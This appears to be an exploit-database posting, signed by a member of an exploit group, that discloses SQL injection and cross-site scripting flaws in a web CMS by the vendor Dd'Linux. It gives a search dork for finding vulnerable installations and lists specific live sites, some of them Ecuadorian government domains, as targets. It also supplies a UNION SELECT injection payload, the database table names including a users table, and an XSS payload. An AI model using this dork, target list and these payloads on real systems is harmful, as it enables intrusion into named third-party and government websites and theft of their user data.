Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities açıkları bulundu. Açık hakkındaki açıklamalar şu şekilde.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| Dd'Linux - SQL Injection / Cross-Site Scripting Vulnerabilities |
--------------------------------------------------------------------------
+----------------| ABOUT ME |--------------------+
NAME: TAURUS OMAR -
HOME: ACCESOILEGAL.BLOGSPOT.COM -
FBOOK: -
TWITTER: -
E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
E-MAIL: omar-taurus[at]live[dot]com -
PWNED: #ZUUU -
+------------------------------------------------+
# Exploit Title: Dd'linux - SQL Injection / Cross-Site Scripting Vulnerabilities
# Vendor Name: Dd'linux
# Url Vendor: http://www.ddlinux.com/
# Category: WebApps
# Type: php
# Risk: Critical
# Dork: intext:"Desarrollado por dd'linux"
# Example/Sql=> http//site.com/xxxx?id=1
# Example/Xss=> http//site.com/search.php [XSS]
# Sample/Sql
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%'
http://www.babahoyo.gob.ec/pagina.php?id=6%'
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%'
http://www.coac-sanfra.com/pagina.php?id=1%'
http://www.chibuleo.com/novedad.php?codigo=3%'
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%'
http://www.galapagostech.com/index.php?id=1%'
http://www.fmrumba.com/contactenos.php?id=7%'
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%'
# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL#
# Info => Same Tables and Columns All Vulnerability Site's
+-------------------------+
| agenda |
| album |
| banner |
| banner_ubicacion |
| contador |
| imagen |
| imagenes_animacion |
| mails |
| mails_paginas |
| noticia |
| opcion |
| opcion1 |
| opcion2 |
| opciones |
| opciones1 |
| transparencia_archivo |
| transparencia_categoria |
| users |
| varios |
+-------------------------+
# Sample/Xss
http://david.ddlinux.com/buscar.php
http://www.fmrumba.com/buscar.php
http://www.babahoyo.gob.ec/buscar.php
# Comand/Xss/=> "><img src=x onerror=alert("1337");>
# Vulnerability/Code
<tbody><tr>
<td><input name="busqueda" id="busqueda" value="" size="15" type="text">
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td>
</tr>
</tbody>